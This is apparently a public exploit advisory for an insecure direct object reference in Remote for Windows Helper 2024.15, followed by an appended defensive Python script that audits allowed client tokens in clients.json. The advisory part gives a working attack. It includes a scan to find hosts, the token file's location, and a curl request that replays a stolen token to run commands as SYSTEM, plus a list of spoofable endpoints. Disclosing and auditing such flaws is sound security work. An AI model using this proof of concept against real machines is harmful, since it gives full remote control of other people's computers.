# Exploit Title: Remote for Windows 2024.15 (helper) - Insecure Direct Object Reference (IDOR)
# Date: 2025-06-13
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)

# Identification:
nmap -p- -T4 --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US

Vulnerability Summary

Remote for Windows Helper 2024.15 contains an Insecure Direct Object Reference (IDOR) vulnerability. Attackers can access privileged API functions by reusing any "Allowed" client token from clients.json without authentication, leading to full system compromise.

"C:\Windows\System32\config\systemprofile\AppData\Roaming\Remote for Windows\clients.json"

[
  {
    "Identifier": "1337",
    "Name": "attacking",
    "Model": "iPhone",
    "Allowed": false,
    "LastAccess": 1749763038698
  },
  {
    "Identifier": "8F5E0017-408E-4996-B698-0BB93D022409",
    "Name": "iPhone",
    "Model": "iPhone10,5",
    "Allowed": true,
    "LastAccess": 1749807277127
  }
]

POC:

curl -k -X GET "https://192.168.8.105:49988/api/executeScript" \
  -H "X-ClientToken: 8F5E0017-408E-4996-B698-0BB93D022409" \
  -H "X-HostName: apple iMac" \
  -H "X-HostFullModel: iMac17,1" \
  -H "X-Script: whoami" \
  -H "X-ScriptName: exploit" \
  -H "X-ScriptDelay: 0" | jq

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    48  100    48    0     0    206      0 --:--:-- --:--:-- --:--:--   206
{
  "result": "nt authority\\system\r\n",
  "error": ""
}

All endpoints are vulnerable to token spoofing:

/api/listApps
/api/rightMouseClick
/api/middleMouseClick
/api/executeScript
/api/listPendingScripts
/api/listCustomActions
/api/leftMouseStatus={0,1}
/api/cancelPendingScript=
/api/getCursorLocation
/api/getScreenshot
/api/enterString=
/api/getActionIcon=
/api/appIcon=
/api/setInputSource=
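Because every "Allowed" Identifier in clients.json is accepted as an X-ClientToken, an administrator's first defensive step is to know which entries carry that flag and revoke any that are no longer needed. The following audit script is an added example, not part of the advisory or of the vendor's software: it parses a clients.json file (the field names, file path and sample entries are taken from the advisory above; the sample is a constructed copy embedded inline), lists the allowed clients with their last-access time, and flags allowed clients that have not been seen within a staleness window. The 30-day window and the `mask` helper are assumptions chosen for the example.

```python
"""Audit the clients.json file described in the advisory.

Added example (not the advisory's or the vendor's code). Lists every client
whose "Allowed" flag is true, since each such Identifier is accepted as an
X-ClientToken, and flags allowed clients that have not been seen recently so
an administrator can review and revoke them.
"""
import json
from datetime import datetime, timezone

# Default location quoted in the advisory (Windows, SYSTEM profile).
CLIENTS_JSON_PATH = (r"C:\Windows\System32\config\systemprofile\AppData\Roaming"
                     r"\Remote for Windows\clients.json")

# Constructed sample mirroring the two entries shown in the advisory.
SAMPLE_CLIENTS_JSON = """[
  {"Identifier": "1337", "Name": "attacking", "Model": "iPhone",
   "Allowed": false, "LastAccess": 1749763038698},
  {"Identifier": "8F5E0017-408E-4996-B698-0BB93D022409", "Name": "iPhone",
   "Model": "iPhone10,5", "Allowed": true, "LastAccess": 1749807277127}
]"""

MS_PER_DAY = 86_400_000  # LastAccess is a Unix timestamp in milliseconds


def load_clients(text):
    """Parse clients.json content, tolerating missing fields with safe defaults."""
    clients = []
    for e in json.loads(text):
        clients.append({
            "Identifier": str(e.get("Identifier", "")),
            "Name": e.get("Name", ""),
            "Model": e.get("Model", ""),
            "Allowed": bool(e.get("Allowed", False)),
            "LastAccess": int(e.get("LastAccess", 0)),
        })
    return clients


def allowed_clients(clients):
    """Entries whose Identifier the helper accepts as an X-ClientToken."""
    return [c for c in clients if c["Allowed"]]


def stale_allowed(clients, now_ms, max_age_days=30):
    """Identifiers of allowed clients whose LastAccess is older than max_age_days."""
    cutoff = now_ms - max_age_days * MS_PER_DAY
    return [c["Identifier"] for c in allowed_clients(clients)
            if c["LastAccess"] < cutoff]


def mask(identifier):
    """Keep only a prefix of the token so the report can be shared without leaking it."""
    return identifier[:8] + "..."


def report(clients, now_ms, max_age_days=30):
    """One line per allowed client; returned as a list so callers can log it."""
    stale = set(stale_allowed(clients, now_ms, max_age_days))
    lines = []
    for c in allowed_clients(clients):
        seen = datetime.fromtimestamp(c["LastAccess"] / 1000, tz=timezone.utc)
        flag = "STALE" if c["Identifier"] in stale else "active"
        lines.append(f"{mask(c['Identifier'])}  {c['Name']:<10} {c['Model']:<12} "
                     f"last seen {seen:%Y-%m-%d %H:%M}Z  [{flag}]")
    return lines


if __name__ == "__main__":
    import sys
    import time
    # Usage: python audit_clients.py [path-to-clients.json]; with no argument the
    # constructed sample above is audited.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path, encoding="utf-8").read() if path else SAMPLE_CLIENTS_JSON
    for line in report(load_clients(text), int(time.time() * 1000)):
        print(line)
```

Run it against the real file on an affected host to see every Identifier that the helper currently honours; each allowed entry that is unknown or stale is a token worth revoking from the helper's client list, and the number of allowed entries is the size of the replayable-token set the advisory describes.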